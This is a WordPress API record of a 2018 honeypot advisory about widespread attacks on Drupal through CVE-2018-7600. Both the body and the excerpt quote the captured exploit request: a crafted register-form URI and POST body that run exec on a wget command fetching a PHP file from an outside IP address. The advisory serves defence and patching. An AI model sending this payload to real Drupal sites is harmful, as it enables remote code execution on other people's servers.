{"id":570,"date":"2018-04-01T09:32:40","date_gmt":"2018-04-01T09:32:40","guid":{"rendered":"http:\/\/www.cloudcoffer.com\/?p=570"},"modified":"2018-04-17T09:36:58","modified_gmt":"2018-04-17T09:36:58","slug":"widespread-drupal-arbitrary-code-execution","status":"publish","type":"post","link":"https:\/\/www.cloudcoffer.com\/?p=570","title":{"rendered":"Widespread Drupal Arbitrary Code Execution"},"content":{"rendered":"<p><strong>Date of Detection:<\/strong><\/p>\n<p>2018.3.29<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Attack Pattern:<\/strong><\/p>\n<ul>\n<li><span style=\"color: #000000;\">URI:<\/span><\/li>\n<\/ul>\n<p>\/user\/register?element_parents=account\/mail\/%23value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><span style=\"color: #000000;\">Request Body:<\/span><\/li>\n<\/ul>\n<p>form_id=user_register_form&amp;_drupal_ajax=1&amp;mail%5B%23post_render%5D%5B%5D=exec&amp;<\/p>\n<p>mail%5B%23type%5D=markup&amp;mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Target System:<\/strong><\/p>\n<p>Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Analysis:<\/strong><\/p>\n<p>This issue is not a zero-day vulnerability and assigned as CVE-2018-7600. However, attackers are scanning and attacking a large portion of worldwide honeypots of CloudCoffer. That means if any system is not updated, it is in a dangerous situation.<\/p>\n<p>Please note that the payload carried from the request bodies are different from requests to requests.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Date of Detection: 2018.3.29 &nbsp; Attack Pattern: URI: \/user\/register?element_parents=account\/mail\/%23value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax &nbsp; Request Body: form_id=user_register_form&amp;_drupal_ajax=1&amp;mail%5B%23post_render%5D%5B%5D=exec&amp; mail%5B%23type%5D=markup&amp;mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php &nbsp; Target System: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code. &nbsp; Analysis: This issue is not a zero-day vulnerability and assigned as CVE-2018-7600. However, attackers are scanning and <a href=\"https:\/\/www.cloudcoffer.com\/?p=570\" rel=\"nofollow\"><span class=\"sr-only\">Read more about Widespread Drupal Arbitrary Code Execution<\/span>[&hellip;]<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-570","post","type-post","status-publish","format-standard","hentry","category-honeypot"],"_links":{"self":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts\/570","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=570"}],"version-history":[{"count":5,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts\/570\/revisions"}],"predecessor-version":[{"id":575,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=\/wp\/v2\/posts\/570\/revisions\/575"}],"wp:attachment":[{"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=570"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=570"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cloudcoffer.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=570"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}